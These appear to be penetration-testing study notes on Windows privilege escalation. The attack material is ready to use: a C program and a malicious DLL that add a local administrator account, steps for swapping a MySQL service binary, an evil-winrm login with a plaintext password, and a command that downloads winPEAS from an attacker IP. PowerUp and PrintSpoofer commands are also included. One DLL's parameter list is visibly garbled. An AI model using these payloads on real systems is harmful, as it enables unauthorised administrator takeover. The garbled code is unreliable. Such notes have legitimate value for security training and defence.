Windows Privilege Escalation


# Windows Enumeration

PS> whoami

PS> whoami /groups

net user
net user steve
Get-LocalUser

net localgroup
Get-LocalGroup

Get-LocalGroupMember Administrators

systeminfo

ipconfig

route print

netstat -ano

PS C:\Users\dave> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

PS C:\Users\dave> Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-Process

PS C:\Users\dave> Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

PS C:\Users\dave> Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

PS C:\Users\dave> Get-ChildItem -Path C:\Users\dave\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

runas

## PowerShell Transcription, PowerShell Script Block Logging

Use the history of previously typed commands as an attack vector:

Get-History

(Get-PSReadlineOption).HistorySavePath

Use WinRM to obtain a PowerShell remoting session

evil-winrm -i 192.168.50.220 -U daveadmin -p "quertquertquert123\!\!"
# this solves problems with WinRM when using it as a pivot from a bind shell

## Automated Enumeration

WinPeas

# File Serving
iwr -uri http://192.168.118.8/winPEASx64.exe -Outfile winPEAS.exe

## Service Binary Hijacking

# Useful cmdlets
services.msc, Get-Service, Get-CimInstance, Get-WmiObject, Get-ACL

# Find running processes and list the path
PS C:\Users\dave> Get-CimInstance -ClassName win32_service | Select Name,State,PathName
| Where-Object {$_.State -like 'Running'}

# List privileges for certain binaries
icacls "filepath"


Permissions in Windows

F -> Full access

M -> Modify access

RX -> Read and execute access

R -> Read-only access

W -> Write-only access

C code to add a user and put it in the local administrators group:

1 #include <stdlib.h>
2
/* Proof of concept that is dropped in place of a hijacked service binary:
 * when the service starts it runs two net.exe commands via system().
 * Defender notes: the account name and password are plaintext string
 * literals in the executable (visible with any strings tool), and a service
 * binary spawning the command interpreter and net.exe is a high-signal
 * detection event. */
3 int main ()
4 {
5 int i; /* return code of system(); assigned below but never checked */
6
7 i = system ("net user dave2 password123! /add"); /* create the local account */
8 i = system ("net localgroup administrators dave2 /add"); /* add it to the administrators group */
9
10 return 0; /* always reports success, even if either command failed */
11 }
12
// compile (cross-compile from Linux with mingw-w64):
// x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

## Binary hijacking:

move C:\xampp\mysql\bin\mysqld.exe mysqld.exe
move .\adduser.exe C:\xampp\mysql\bin\mysqld.exe
net stop mysql

# check the StartMode
# PS C:\Users\dave> Get-CimInstance -ClassName win32_service |
# Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}

shutdown /r /t 0

# check if the exploit was successful and an administrator was added
Get-LocalGroupMember administrators

PowerUp.ps1

Get-ModifiableServiceFile # display services the current user can modify


Install-ServiceBinary -Name 'mysql' # see also Get-ModifiablePath

## Service DLL hijacking

Safe DLL search mode order:

1. The directory from which the application loaded.

2. The system directory.

3. The 16-bit system directory.

4. The Windows directory.

5. The current directory.

6. The directories that are listed in the PATH environment variable.

download the service binary you want to monitor

# use ProcMon
# add filter 'Process Name is BetaServ.exe'
# restart the service so that you can see dll being loaded
Restart-Service BetaService
# check for DLLs whose load result is 'name not found'

# hijack an arbitrary .dll: DllMain is executed when the DLL is attached (loaded)

basic.dll:

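BOOL APIENTRY DllMain(
    HANDLE hModule,             // Handle to DLL module
    DWORD  ul_reason_for_call,  // Reason for calling function
    LPVOID pReserved)           // Reserved
{
    // Minimal DllMain skeleton: the loader calls this once for every
    // attach/detach event and the function does nothing but acknowledge it.
    // Whatever is placed under DLL_PROCESS_ATTACH runs as soon as the DLL is
    // loaded, without any exported function being called.
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:    // A process is loading the DLL.
        break;
    case DLL_THREAD_ATTACH:     // A process is creating a new thread.
        break;
    case DLL_THREAD_DETACH:     // A thread exits normally.
        break;
    case DLL_PROCESS_DETACH:    // A process unloads the DLL.
        break;
    }                           // closing brace of the switch was missing in the original copy
    return TRUE;                // TRUE tells the loader the attach succeeded
}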

myDLL.dll

#include <stdlib.h>
#include <windows.h>
/* Same skeleton as basic.dll, with the adduser payload moved under
 * DLL_PROCESS_ATTACH so it runs the moment the hijacked DLL is loaded.
 * Defender notes: the credentials are plaintext string literals in the DLL,
 * and a service process loading an unexpected DLL and then spawning the
 * command interpreter / net.exe is the behaviour to alert on. */
BOOL APIENTRY DllMain(
HANDLE hModule, // Handle to DLL module
DevoT preserved Ta Reserveason for calling function // NOTE(review): this parameter line is garbled in this copy; the basic.dll skeleton above has the intact parameter list
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH: // A process is loading the DLL.
int i; // declaration directly after a case label: accepted by C++ (file is built as .cpp), some C compilers reject it; the value is never read
i = system ("net user dave2 password123! /add"); // create the local account
i = system ("net localgroup administrators dave2 /add"); // add it to the administrators group
break;
case DLL_THREAD_ATTACH: // A process is creating a new thread.
break;
case DLL_THREAD_DETACH: // A thread exits normally.
break;
case DLL_PROCESS_DETACH: // A process unloads the DLL.
break;
}
return TRUE; // tell the loader the attach succeeded
}
// compile:
// x86_64-w64-mingw32-gcc myDLL.cpp -shared -o myDLL.dll
// -shared is for DLL compilation
// serve it and then Restart-Service BetaService to execute

## Unquoted service paths

Applies when we have write permission on the service's directory or its subdirectories, but cannot replace the files in them.

# example
# when trying to execute the following path
C:\Program Files\My Program\My Service\service.exe
# Windows will try to execute, in order:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My Service\service.exe

# we can create one of these executables ourselves
# vector:

Get-CimInstance -ClassName win32_service | Select Name, State, PathName
# and find unquoted execution paths, or
#cmd
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """
#\"

# /v -> don't match

# now use icacls to see if the current user can write in one of the paths
# exploit.exe
# check if the attack was successful
net user
net localgroup administrators

#with PowerUp.ps1:
Get-UnquotedService
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"

## Scheduled Tasks

Get-ScheduledTask
schtasks /query /fo LIST /v

# search for tasks with admin priv and write permission on the executable

## SeImpersonatePrivilege or other privileges

whoami /priv
# if our user has some strange privilege associated, we
# should look on how to exploit it

PS C:\Users\dave> .\PrintSpoofer64.exe -i -c powershell.exe
# -i interactive, -c command
# Other privileges that may lead to privilege escalation are
# SeBackupPrivilege, SeAssignPrimaryTokenPrivilege, SeLoadDriverPrivilege, and
# SeDebugPrivilege